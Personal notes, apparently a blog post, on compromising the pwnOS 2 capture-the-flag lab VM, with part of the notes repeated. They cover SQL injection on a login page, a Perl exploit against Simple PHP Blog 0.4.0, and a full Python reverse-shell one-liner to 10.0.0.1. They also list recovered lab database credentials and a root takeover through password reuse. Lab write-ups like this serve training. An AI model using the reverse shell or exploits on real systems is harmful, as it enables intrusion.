Walkthru
A. http://defsecurityjam.blogspot.co.uk/2015/07/pwnos-version-2-walkthrough.html [reading source page, Simple PHP Blog Perl exploit, Python revershell using oneliner, looking around ]
b. https://blog.g0tmi1k.com/2012/09/pwnos-2-php-web-application/ [metasploit using PHP Blog exploit]
c. http://netsec.ws/?p=430 [burpsuite, sql porxy]
d. https://blog.g0tmi1k.com/2012/09/pwnos-2-sql-injection/ [sql injection, union. Very good explanation of the process of what is being done. Didnt try cmds]
e. https://www.youtube.com/watch?v=ytzZfI27ueU [sql injection, sqlmap read file and upload reverse shell using sqlmap]
f. https://ub3rsec.github.io/pages/2016/pwnosv2-sqli.html [sql injection, union using burp Very good. It list all email field that we are passing and modifying thru burp suite/proxy/intercept. One could enter those union statements in the email field but in this case, the field truncates and remove the later part of union statment which is why we have to use burp to enter the union statement. If the field wouldnt trubcate, we could just enter those in the email field. First 2 union could be entered in the email field directly. ]
Notes:
1. Scan http and 22
2.was able to login to login.php usign sql injection but not much info
3. Also has /blog . but was unable to login
4. I decided to take a closer look at the source of the /blog page. I found that the underlying app was Simple PHP Blog 0.4.0.
4c. walkthru A shows reset pwd which worked but wasnt used and uploading PHP revereshell which didnt work. I was able to upload the php revershell using the cmd.php=wget... and could see it under /blog/images but wasnt able to get reverse connection. Was getting following message when I clicked on the php file on the browser "WARNING: Failed to daemonise. This is quite common and not fatal. Connection refused (111)" Tried on other ports such as 80, 443 and 1234 but didnt work so I used different reverse shell from cheat sheet. Went thru the list and was able to make the PYTHON shell worked. It also worked on other ports 4444 and 443
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');
A. http://defsecurityjam.blogspot.co.uk/2015/07/pwnos-version-2-walkthrough.html [reading source page, Simple PHP Blog Perl exploit, Python revershell using oneliner, looking around ]
b. https://blog.g0tmi1k.com/2012/09/pwnos-2-php-web-application/ [metasploit using PHP Blog exploit]
c. http://netsec.ws/?p=430 [burpsuite, sql porxy]
d. https://blog.g0tmi1k.com/2012/09/pwnos-2-sql-injection/ [sql injection, union. Very good explanation of the process of what is being done. Didnt try cmds]
e. https://www.youtube.com/watch?v=ytzZfI27ueU [sql injection, sqlmap read file and upload reverse shell using sqlmap]
f. https://ub3rsec.github.io/pages/2016/pwnosv2-sqli.html [sql injection, union using burp Very good. It list all email field that we are passing and modifying thru burp suite/proxy/intercept. One could enter those union statements in the email field but in this case, the field truncates and remove the later part of union statment which is why we have to use burp to enter the union statement. If the field wouldnt trubcate, we could just enter those in the email field. First 2 union could be entered in the email field directly. ]
Notes:
1. Scan http and 22
2.was able to login to login.php usign sql injection but not much info
3. Also has /blog . but was unable to login
4. I decided to take a closer look at the source of the /blog page. I found that the underlying app was Simple PHP Blog 0.4.0.
4a. Lets see if we can find any vulnerabilities or exploits associated with Simple PHP Blog 0.4.0
4b. The exploitdb had a couple exploits that fit the bill, one Metasploit module as well as the perl based exploit that I decided to go with
| root@kali:~/pwnos2# perl 1191.pl -h http://10.10.10.100/blog -e 2 |
5. Python: This was tested under Linux / Python 2.7:[source:http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet]
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
6.The file named mysqli_connect.php had some mysql db credentials in it.
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');
7. We all know about the likelihood of password reuse, so I attempted to try what I found both inside and outside the database. Unfortunately it didn't workout for me. I spent several hours running local privilege escalation exploits, Linux privilege vulnerability scripts, etc, until I stumbled across a separate file also named mysqli_connect.php located at in the /var directory. This file had separate credentials which worked for the mysql instance. I decided to pillage the db a bit.
| cat mysqli_connect.php // This file contains the database access information. // This file also establishes a connection to MySQL // and selects the database. // Set the database access information as constants: DEFINE ('DB_USER', 'root'); DEFINE ('DB_PASSWORD', 'root@ISIntS'); DEFINE ('DB_HOST', 'localhost'); DEFINE ('DB_NAME', 'ch16'); |
8. After spawing a terminal session su and pwd "root@ISIntS", we are root
9 Walkthru A, includes some additional sql/select connection commands
Comments
Post a Comment